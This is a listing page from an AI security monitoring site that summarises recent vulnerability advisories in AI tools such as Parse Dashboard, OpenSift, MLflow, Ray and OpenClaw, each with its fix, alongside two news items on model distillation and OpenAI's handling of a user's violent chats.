aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI & LLM Vulnerabilities

Security vulnerabilities, privacy incidents, safety concerns, and policy updates affecting LLMs and AI agents.

to
Export CSV
1453 items

CVE-2026-27597: Enclave is a secure JavaScript sandbox designed for safe AI agent code execution. Prior to version 2.11.1, it is possibl

criticalvulnerability
security
Feb 24, 2026
CVE-2026-27597

Enclave is a secure JavaScript sandbox designed to safely run code from AI agents, but versions before 2.11.1 had a vulnerability that allowed attackers to escape the security boundaries and achieve RCE (remote code execution, where an attacker can run commands on a system they don't own). This weakness is related to code injection (CWE-94, a type of bug where untrusted input is used to generate code that gets executed).

Fix: Update to version 2.11.1 or later. The issue has been fixed in version 2.11.1.

NVD/CVE Database

CVE-2026-27609: Parse Dashboard is a standalone dashboard for managing Parse Server apps. In versions 7.3.0-alpha.42 through 9.0.0-alpha

highvulnerability
security
Feb 24, 2026
CVE-2026-27609

Parse Dashboard versions 7.3.0-alpha.42 through 9.0.0-alpha.7 have a CSRF vulnerability (cross-site request forgery, where an attacker tricks a logged-in user into unknowingly sending requests to a website). An attacker can create a malicious webpage that, when visited by someone authenticated to Parse Dashboard, forces their browser to send unwanted requests to the AI Agent API endpoint without their knowledge. This vulnerability is fixed in version 9.0.0-alpha.8 and later.

CVE-2026-27608: Parse Dashboard is a standalone dashboard for managing Parse Server apps. In versions 7.3.0-alpha.42 through 9.0.0-alpha

highvulnerability
security
Feb 24, 2026
CVE-2026-27608

Parse Dashboard versions 7.3.0-alpha.42 through 9.0.0-alpha.7 have a security flaw in the AI Agent API endpoint (a feature for managing Parse Server apps) where authorization checks are missing, allowing authenticated users to access other apps' data and read-only users to perform write and delete operations they shouldn't be allowed to do. Only dashboards with the agent feature enabled are vulnerable to this issue.

CVE-2026-27595: Parse Dashboard is a standalone dashboard for managing Parse Server apps. In versions 7.3.0-alpha.42 through 9.0.0-alpha

criticalvulnerability
security
Feb 24, 2026
CVE-2026-27595

Parse Dashboard versions 7.3.0-alpha.42 through 9.0.0-alpha.7 have security vulnerabilities in the AI Agent API endpoint that allow unauthenticated attackers to read and write data from any connected database using the master key (a special admin credential that grants full access). The agent feature must be enabled to be vulnerable, so dashboards without it are safe.

GHSA-299v-8pq9-5gjq: New API has Potential XSS in its MarkdownRenderer component

highvulnerability
security
Feb 23, 2026
CVE-2026-25802

A security vulnerability exists in the `MarkdownRenderer.jsx` component where it uses `dangerouslySetInnerHTML` (a React feature that directly inserts HTML code without filtering) to display content generated by the AI model, allowing XSS (cross-site scripting, where attackers inject malicious code that runs in a user's browser). This means if the model outputs code containing `<script>` tags, those scripts will execute automatically, potentially redirecting users or performing other harmful actions, and the problem persists even after closing the chat because the malicious script gets saved in the chat history.

Anthropic accuses Chinese AI labs of mining Claude as US debates AI chip exports

highincident
securitypolicy

OpenAI debated calling police about suspected Canadian shooter’s chats

infoincident
safetypolicy

CVE-2026-27487: OpenClaw is a personal AI assistant. In versions 2026.2.13 and below, when using macOS, the Claude CLI keychain credenti

highvulnerability
security
Feb 21, 2026
CVE-2026-27487

OpenClaw, a personal AI assistant, had a security flaw in versions 2026.2.13 and below on macOS where OAuth tokens (authentication credentials that prove you're logged in) could be used to inject malicious OS commands (commands that run at the operating system level) into the credential refresh process. An attacker could exploit this by crafting a specially designed token to execute arbitrary commands on the affected system.

CVE-2026-27189: OpenSift is an AI study tool that sifts through large datasets using semantic search and generative AI. Versions 1.1.2-a

mediumvulnerability
security
Feb 20, 2026
CVE-2026-27189

OpenSift is an AI study tool that uses semantic search (finding information based on meaning rather than exact keyword matches) and generative AI to analyze large datasets. Versions 1.1.2-alpha and earlier have a vulnerability where multiple operations happening at the same time can corrupt or lose data in local JSON files (a common data storage format), affecting study notes, quizzes, flashcards, and user accounts.

CVE-2026-27170: OpenSift is an AI study tool that sifts through large datasets using semantic search and generative AI. In versions 1.1.

highvulnerability
security
Feb 20, 2026
CVE-2026-27170

OpenSift, an AI study tool that searches through large datasets using semantic search (finding similar content based on meaning) and generative AI, has a vulnerability in versions 1.1.2-alpha and below where it can be tricked into requesting unsafe internet addresses through its URL ingest feature (the part that accepts web links as input). An attacker could exploit this to access private or local network resources from the computer running OpenSift.

CVE-2026-27169: OpenSift is an AI study tool that sifts through large datasets using semantic search and generative AI. Versions 1.1.2-a

highvulnerability
security
Feb 20, 2026
CVE-2026-27169

OpenSift, an AI study tool that uses semantic search (finding information by meaning rather than exact keywords) and generative AI to analyze large datasets, has a vulnerability in versions 1.1.2-alpha and below where untrusted content is rendered unsafely in the chat interface, allowing XSS (cross-site scripting, where attackers inject malicious code that runs in a user's browser). An attacker who can modify stored study materials could execute JavaScript code when a legitimate user views that content, potentially letting the attacker perform actions as that user within the application.

CVE-2026-2635: MLflow Use of Default Password Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass

highvulnerability
security
Feb 20, 2026
CVE-2026-2635

MLflow contains a vulnerability (CVE-2026-2635) where hard-coded default credentials are stored in the basic_auth.ini file, allowing remote attackers to bypass authentication without needing valid login information and potentially execute code with administrator privileges. This flaw exploits the use of default passwords, a common security mistake where systems ship with unchangeable built-in login credentials.

CVE-2026-2492: TensorFlow HDF5 Library Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability al

highvulnerability
security
Feb 20, 2026
CVE-2026-2492

TensorFlow has a vulnerability where it loads plugins from an unsafe location, allowing attackers who already have low-level access to a system to gain higher privileges (privilege escalation, where an attacker gains elevated permissions to do things they normally couldn't). An attacker exploiting this flaw could run arbitrary code (any commands they choose) with the same permissions as the target user.

CVE-2026-2033: MLflow Tracking Server Artifact Handler Directory Traversal Remote Code Execution Vulnerability. This vulnerability allo

criticalvulnerability
security
Feb 20, 2026
CVE-2026-2033EPSS: 15.6%

MLflow Tracking Server has a directory traversal (a flaw where an attacker uses special path characters like '../' to access files outside intended directories) vulnerability in its artifact file handler that allows unauthenticated attackers to execute arbitrary code on the server. The vulnerability exists because the server doesn't properly validate file paths before using them in operations, letting attackers run code with the permissions of the service account running MLflow.

GHSA-cxpw-2g23-2vgw: OpenClaw: ACP prompt-size checks missing in local stdio bridge could reduce responsiveness with very large inputs

mediumvulnerability
security
Feb 20, 2026
CVE-2026-27576

OpenClaw's ACP bridge (a local communication protocol for IDE integrations) didn't check prompt size limits before processing, causing the system to accept and forward extremely large text blocks that could slow down local sessions and increase API costs. The vulnerability only affects local clients sending unusually large inputs, with no remote attack risk.

GHSA-wh2j-26j7-9728: Google Cloud Vertex AI has a a vulnerability involving predictable bucket naming

highvulnerability
security
Feb 20, 2026
CVE-2026-2473

This advisory describes a vulnerability in Google Cloud Vertex AI related to predictable bucket naming (a bucket is a container for storing data in cloud storage). The content provided explains the framework used to assess vulnerability severity through metrics like attack vector, complexity, and required privileges, but does not describe the actual vulnerability details, its impact, or how it affects users.

GHSA-qv8j-hgpc-vrq8: Google Cloud Vertex AI SDK affected by Stored Cross-Site Scripting (XSS)

highvulnerability
security
Feb 20, 2026
CVE-2026-2472

This advisory describes a stored XSS (cross-site scripting, where malicious code is saved and executed when users view a webpage) vulnerability in Google Cloud Vertex AI SDK. The text provided explains the CVSS scoring framework (a 0-10 rating system for vulnerability severity) used to evaluate this vulnerability, covering factors like how an attacker could exploit it, what privileges they need, and what systems could be impacted.

GHSA-q5fh-2hc8-f6rq: Ray dashboard DELETE endpoints allow unauthenticated browser-triggered DoS (Serve shutdown / job deletion)

mediumvulnerability
security
Feb 20, 2026
CVE-2026-27482

Ray's dashboard HTTP server (a web interface for monitoring Ray clusters) doesn't block DELETE requests from browsers, even though it blocks POST and PUT requests. This allows someone on the same network or using DNS rebinding (tricking a domain to point to a local address) to shut down Serve (Ray's serving system) or delete jobs without authentication, since token-based auth is disabled by default. The attack requires no user interaction beyond visiting a malicious webpage.

GHSA-r6h2-5gqq-v5v6: OpenClaw: Reject symlinks in local skill packaging script

mediumvulnerability
security
Feb 20, 2026
CVE-2026-27485

OpenClaw's skill packaging script had a vulnerability where it followed symlinks (shortcuts to files stored elsewhere on a computer) while building `.skill` archives, potentially including unintended files from outside the skill directory. This issue only affects local skill authors during packaging and has low severity since it cannot be triggered remotely through the normal OpenClaw system.

GHSA-wh94-p5m6-mr7j: OpenClaw Discord moderation authorization used untrusted sender identity in tool-driven flows

lowvulnerability
security
Feb 20, 2026
CVE-2026-27484

OpenClaw, a Discord moderation bot package, had a security flaw where moderation actions like timeout, kick, and ban used untrusted sender identity from user requests instead of verified system context, allowing non-admin users to spoof their identity and perform these actions. The vulnerability affected all versions up to 2026.2.17 and was fixed in version 2026.2.18.

Previous10 / 73Next

Fix: Update to version 9.0.0-alpha.8 or later, which adds CSRF middleware (code that checks requests are legitimate) to the agent endpoint and embeds a CSRF token (a secret code) in the dashboard page. Alternatively, remove the `agent` configuration block from your dashboard configuration file as a temporary workaround.

NVD/CVE Database

Fix: Update to version 9.0.0-alpha.8 or later, which adds authorization checks and restricts read-only users to a limited key with write permissions removed server-side (the server prevents writes even if requested). As a temporary workaround, remove the `agent` configuration block from your dashboard configuration file.

NVD/CVE Database

Fix: Upgrade to version 9.0.0-alpha.8 or later, which adds authentication, CSRF validation (protection against forged requests), and per-app authorization middleware to the agent endpoint. Alternatively, remove or comment out the agent configuration block from your Parse Dashboard configuration file as a temporary workaround.

NVD/CVE Database

Fix: The source text suggests that 'the preview may be placed in an iframe sandbox' (a restricted container that limits what code can do) and 'dangerous html strings should be purified before rendering' (cleaning the HTML to remove harmful elements before displaying it). However, these are listed as 'Potential Workaround' suggestions rather than confirmed fixes or patches.

GitHub Advisory Database
Feb 23, 2026

Anthropic accused three Chinese AI companies (DeepSeek, Moonshot AI, and MiniMax) of using distillation (a technique where one AI model learns from another by analyzing its outputs) to illegally extract capabilities from Claude by creating over 24,000 fake accounts and generating millions of interactions. This theft targeted Claude's most advanced features like reasoning, tool use, and coding, and raises security concerns because stolen models may lack safeguards against misuse like bioweapon development.

Fix: Anthropic stated it will 'continue to invest in defenses that make distillation attacks harder to execute and easier to identify,' and is calling on 'a coordinated response across the AI industry, cloud providers, and policymakers.' The company also argues that export controls on advanced AI chips to China would limit both direct model training and the scale of such distillation attacks.

TechCrunch
Feb 21, 2026

OpenAI's monitoring tools flagged an 18-year-old user's chats on ChatGPT (a large language model chatbot) that described gun violence, leading to the account being banned in June 2025. The company debated whether to alert Canadian police but decided the chats didn't meet reporting criteria, though OpenAI later contacted authorities after the user allegedly killed eight people in a mass shooting in Canada.

TechCrunch

Fix: Update to version 2026.2.14 or later. According to the source, 'This issue has been fixed in version 2026.2.14.'

NVD/CVE Database

Fix: This issue has been fixed in version 1.1.3-alpha. Users should upgrade to version 1.1.3-alpha or later.

NVD/CVE Database

Fix: This issue has been fixed in version 1.1.3-alpha. As a temporary workaround for trusted local-only exceptions, use the setting OPENSIFT_ALLOW_PRIVATE_URLS=true, but this should be used with caution.

NVD/CVE Database

Fix: This issue has been fixed in version 1.1.3-alpha.

NVD/CVE Database
NVD/CVE Database
NVD/CVE Database
NVD/CVE Database

Fix: The patched version 2026.2.18 enforces a 2 MiB (2 megabyte) prompt-text limit before combining text blocks, counts newline separator bytes during size checks, maintains final message-size validation before sending to the chat service, prevents stale session state when oversized prompts are rejected, and adds regression tests for oversize rejection and cleanup.

GitHub Advisory Database
GitHub Advisory Database
GitHub Advisory Database

Fix: Update to Ray 2.54.0 or higher. Fix PR: https://github.com/ray-project/ray/pull/60526

GitHub Advisory Database

Fix: Reject symlinks during skill packaging. Add regression tests for symlink file and symlink directory cases. Update packaging guidance to document the symlink restriction. The fix is available in commit c275932aa4230fb7a8212fe1b9d2a18424874b3f and ee1d6427b544ccadd73e02b1630ea5c29ba9a9f0, with the patched version planned for release as openclaw@2026.2.18.

GitHub Advisory Database

Fix: Moderation authorization was updated to use trusted sender context (requesterSenderId) instead of untrusted action parameters, and permission checks were added to verify the bot has required guild capabilities for each action. Update to version 2026.2.18 or later.

GitHub Advisory Database